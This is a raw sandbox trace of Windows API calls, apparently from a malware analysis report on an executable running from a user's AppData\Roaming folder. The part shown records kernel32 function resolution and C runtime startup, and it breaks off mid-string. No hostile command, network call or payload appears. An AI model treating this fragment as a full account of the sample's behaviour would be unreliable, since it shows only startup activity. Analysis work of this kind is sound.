RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="CreateFileMappingW" | out: DestinationString="CreateFileMappingW") [0202.235] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="CreateFileMappingW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221909) returned 0x0 [0202.235] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetDiskFreeSpaceA" | out: DestinationString="GetDiskFreeSpaceA") [0202.235] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetDiskFreeSpaceA", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762a433f) returned 0x0 [0202.235] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetSystemInfo" | out: DestinationString="GetSystemInfo") [0202.235] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetSystemInfo", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762249ca) returned 0x0 [0202.235] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetFileAttributesExW" | out: DestinationString="GetFileAttributesExW") [0202.236] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetFileAttributesExW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76224574) returned 0x0 [0202.236] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="DeleteCriticalSection" | out: DestinationString="DeleteCriticalSection") [0202.236] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="DeleteCriticalSection", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76fd45f5) returned 0x0 [0202.236] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="CloseHandle" | out: DestinationString="CloseHandle") [0202.236] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="CloseHandle", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221410) returned 0x0 [0202.236] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="DeleteFileW" | out: DestinationString="DeleteFileW") [0202.236] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="DeleteFileW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762289b3) returned 0x0 [0202.236] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetCurrentProcessId" | out: DestinationString="GetCurrentProcessId") [0202.236] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetCurrentProcessId", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762211f8) returned 0x0 [0202.236] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetTempPathA" | out: DestinationString="GetTempPathA") [0202.237] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetTempPathA", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7624276c) returned 0x0 [0202.237] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="LocalFree" | out: DestinationString="LocalFree") [0202.237] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="LocalFree", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76222d3c) returned 0x0 [0202.237] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetSystemTime" | out: DestinationString="GetSystemTime") [0202.237] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetSystemTime", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76225a96) returned 0x0 [0202.237] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="AreFileApisANSI" | out: DestinationString="AreFileApisANSI") [0202.237] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="AreFileApisANSI", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762a40d1) returned 0x0 [0202.237] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="DeleteFileA" | out: DestinationString="DeleteFileA") [0202.237] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="DeleteFileA", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76225444) returned 0x0 [0202.237] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="HeapFree" | out: DestinationString="HeapFree") [0202.238] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="HeapFree", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762214c9) returned 0x0 [0202.238] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="HeapAlloc" | out: DestinationString="HeapAlloc") [0202.238] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="HeapAlloc", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76fce026) returned 0x0 [0202.238] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="HeapReAlloc" | out: DestinationString="HeapReAlloc") [0202.238] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="HeapReAlloc", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76fe1f6e) returned 0x0 [0202.238] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetCurrentThreadId" | out: DestinationString="GetCurrentThreadId") [0202.238] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetCurrentThreadId", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221450) returned 0x0 [0202.238] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="DecodePointer" | out: DestinationString="DecodePointer") [0202.238] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="DecodePointer", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76fd9d35) returned 0x0 [0202.238] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetCommandLineA" | out: DestinationString="GetCommandLineA") [0202.239] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetCommandLineA", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762251a1) returned 0x0 [0202.253] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="TerminateProcess" | out: DestinationString="TerminateProcess") [0202.253] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="TerminateProcess", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7623d802) returned 0x0 [0202.253] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetCurrentProcess" | out: DestinationString="GetCurrentProcess") [0202.254] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetCurrentProcess", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221809) returned 0x0 [0202.254] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="UnhandledExceptionFilter" | out: DestinationString="UnhandledExceptionFilter") [0202.254] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="UnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7624772f) returned 0x0 [0202.254] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="SetUnhandledExceptionFilter" | out: DestinationString="SetUnhandledExceptionFilter") [0202.254] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="SetUnhandledExceptionFilter", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762287c9) returned 0x0 [0202.254] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="IsDebuggerPresent" | out: DestinationString="IsDebuggerPresent") [0202.254] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="IsDebuggerPresent", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76224a5d) returned 0x0 [0202.254] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="IsProcessorFeaturePresent" | out: DestinationString="IsProcessorFeaturePresent") [0202.255] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="IsProcessorFeaturePresent", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76225235) returned 0x0 [0202.255] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="HeapCreate" | out: DestinationString="HeapCreate") [0202.255] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="HeapCreate", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76224a2d) returned 0x0 [0202.255] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="HeapDestroy" | out: DestinationString="HeapDestroy") [0202.255] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="HeapDestroy", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762235b7) returned 0x0 [0202.255] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetModuleHandleW" | out: DestinationString="GetModuleHandleW") [0202.255] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetModuleHandleW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762234b0) returned 0x0 [0202.255] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="ExitProcess" | out: DestinationString="ExitProcess") [0202.255] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="ExitProcess", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76227a10) returned 0x0 [0202.255] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetStdHandle" | out: DestinationString="GetStdHandle") [0202.256] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetStdHandle", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762251b3) returned 0x0 [0202.256] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetModuleFileNameW" | out: DestinationString="GetModuleFileNameW") [0202.256] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetModuleFileNameW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76224950) returned 0x0 [0202.256] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="EncodePointer" | out: DestinationString="EncodePointer") [0202.256] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="EncodePointer", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76fe0fcb) returned 0x0 [0202.256] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetTimeZoneInformation" | out: DestinationString="GetTimeZoneInformation") [0202.257] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetTimeZoneInformation", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7622465a) returned 0x0 [0202.257] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="TlsAlloc" | out: DestinationString="TlsAlloc") [0202.257] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="TlsAlloc", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762249ad) returned 0x0 [0202.257] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="TlsGetValue" | out: DestinationString="TlsGetValue") [0202.257] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="TlsGetValue", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762211e0) returned 0x0 [0202.257] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="TlsSetValue" | out: DestinationString="TlsSetValue") [0202.257] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="TlsSetValue", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762214fb) returned 0x0 [0202.257] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="TlsFree" | out: DestinationString="TlsFree") [0202.258] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="TlsFree", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76223587) returned 0x0 [0202.258] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="InterlockedIncrement" | out: DestinationString="InterlockedIncrement") [0202.258] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="InterlockedIncrement", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221400) returned 0x0 [0202.258] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="SetLastError" | out: DestinationString="SetLastError") [0202.258] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="SetLastError", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762211a9) returned 0x0 [0202.258] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="InterlockedDecrement" | out: DestinationString="InterlockedDecrement") [0202.259] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="InterlockedDecrement", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762213f0) returned 0x0 [0202.259] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="SetHandleCount" | out: DestinationString="SetHandleCount") [0202.259] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="SetHandleCount", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7622cb29) returned 0x0 [0202.259] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="InitializeCriticalSectionAndSpinCount" | out: DestinationString="InitializeCriticalSectionAndSpinCount") [0202.259] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="InitializeCriticalSectionAndSpinCount", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221916) returned 0x0 [0202.259] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetFileType" | out: DestinationString="GetFileType") [0202.259] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetFileType", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76223531) returned 0x0 [0202.259] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetStartupInfoW" | out: DestinationString="GetStartupInfoW") [0202.260] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetStartupInfoW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76224d40) returned 0x0 [0202.260] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetModuleFileNameA" | out: DestinationString="GetModuleFileNameA") [0202.260] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetModuleFileNameA", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762214b1) returned 0x0 [0202.260] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="FreeEnvironmentStringsW" | out: DestinationString="FreeEnvironmentStringsW") [0202.260] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="FreeEnvironmentStringsW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762251cb) returned 0x0 [0202.260] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetEnvironmentStringsW" | out: DestinationString="GetEnvironmentStringsW") [0202.261] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetEnvironmentStringsW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762251e3) returned 0x0 [0202.261] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetCPInfo" | out: DestinationString="GetCPInfo") [0202.261] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetCPInfo", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76225189) returned 0x0 [0202.261] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetACP" | out: DestinationString="GetACP") [0202.261] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetACP", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7622179c) returned 0x0 [0202.261] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetOEMCP" | out: DestinationString="GetOEMCP") [0202.261] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetOEMCP", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7624d1a1) returned 0x0 [0202.261] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="IsValidCodePage" | out: DestinationString="IsValidCodePage") [0202.262] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="IsValidCodePage", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76224493) returned 0x0 [0202.262] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="RtlUnwind" | out: DestinationString="RtlUnwind") [0202.262] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="RtlUnwind", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7624d1c3) returned 0x0 [0202.262] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="HeapSize" | out: DestinationString="HeapSize") [0202.262] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="HeapSize", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76fd3002) returned 0x0 [0202.262] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="LCMapStringW" | out: DestinationString="LCMapStringW") [0202.263] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="LCMapStringW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x762217b9) returned 0x0 [0202.263] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="GetStringTypeW" | out: DestinationString="GetStringTypeW") [0202.263] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="GetStringTypeW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76221946) returned 0x0 [0202.263] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="CompareStringW" | out: DestinationString="CompareStringW") [0202.263] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="CompareStringW", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x76223bca) returned 0x0 [0202.263] RtlInitAnsiString (in: DestinationString=0x415fa3c, SourceString="SetEnvironmentVariableA" | out: DestinationString="SetEnvironmentVariableA") [0202.263] LdrGetProcedureAddress (in: BaseAddress=0x76210000, Name="SetEnvironmentVariableA", Ordinal=0x0, ProcedureAddress=0x415fa5c | out: ProcedureAddress=0x415fa5c*=0x7622e331) returned 0x0 [0202.276] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x415fa4c | out: lpSystemTimeAsFileTime=0x415fa4c*(dwLowDateTime=0xc3acd6d0, dwHighDateTime=0x1d6a092)) [0202.276] GetCurrentProcessId () returned 0x7b8 [0202.276] GetCurrentThreadId () returned 0x364 [0202.276] GetTickCount () returned 0x114032c [0202.276] QueryPerformanceCounter (in: lpPerformanceCount=0x415fa44 | out: lpPerformanceCount=0x415fa44*=14324814847) returned 1 [0202.288] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2e10000 [0202.289] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76210000 [0202.289] GetProcAddress (hModule=0x76210000, lpProcName="FlsAlloc") returned 0x76224f2b [0202.290] GetProcAddress (hModule=0x76210000, lpProcName="FlsGetValue") returned 0x76221252 [0202.290] GetProcAddress (hModule=0x76210000, lpProcName="FlsSetValue") returned 0x76224208 [0202.290] GetProcAddress (hModule=0x76210000, lpProcName="FlsFree") returned 0x7622359f [0202.314] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x214) returned 0x2e107d0 [0202.314] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76210000 [0202.315] GetCurrentThreadId () returned 0x364 [0202.315] GetCommandLineA () returned="\"{path}\"" [0202.315] GetEnvironmentStringsW () returned 0x4260048* [0202.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0202.315] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x565) returned 0x2e109f0 [0202.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2e109f0, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0202.315] FreeEnvironmentStringsW (penv=0x4260048) returned 1 [0202.315] GetStartupInfoW (in: lpStartupInfo=0x415f994 | out: lpStartupInfo=0x415f994*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x4460000, hStdError=0x565)) [0202.315] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x8, Size=0x800) returned 0x2e10f60 [0202.316] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0202.316] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0202.316] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0202.316] SetHandleCount (uNumber=0x20) returned 0x20 [0202.316] GetLastError () returned 0x0 [0202.316] SetLastError (dwErrCode=0x0) [0202.316] GetLastError () returned 0x0 [0202.316] SetLastError (dwErrCode=0x0) [0202.316] GetLastError () returned 0x0 [0202.316] SetLastError (dwErrCode=0x0) [0202.316] GetACP () returned 0x4e4 [0202.316] RtlAllocateHeap (HeapHandle=0x2e10000, Flags=0x0, Size=0x220) returned 0x2e11768 [0202.316] GetLastError () returned 0x0 [0202.316] SetLastError (dwErrCode=0x0) [0202.316] IsValidCodePage (CodePage=0x4e4) returned 1 [0202.316] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x415f95c | out: lpCPInfo=0x415f95c) returned 1 [0202.316] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x415f428 | out: lpCPInfo=0x415f428) returned 1 [0202.328] GetLastError () returned 0x0 [0202.328] SetLastError (dwErrCode=0x0) [0202.328] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x415f83c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0202.332] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x415f83c, cbMultiByte=256, lpWideCharStr=0x415f1a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뚯ьĀ") returned 256 [0202.332] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ뚯ьĀ", cchSrc=256, lpCharType=0x415f43c | out: lpCharType=0x415f43c) returned 1 [0202.336] GetLastError () returned 0x0 [0202.336] SetLastError (dwErrCode=0x0) [0202.336] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x415f83c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0202.336] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x415f83c, cbMultiByte=256, lpWideCharStr=0x415f178, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0202.336] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0202.336] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x415ef68, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ 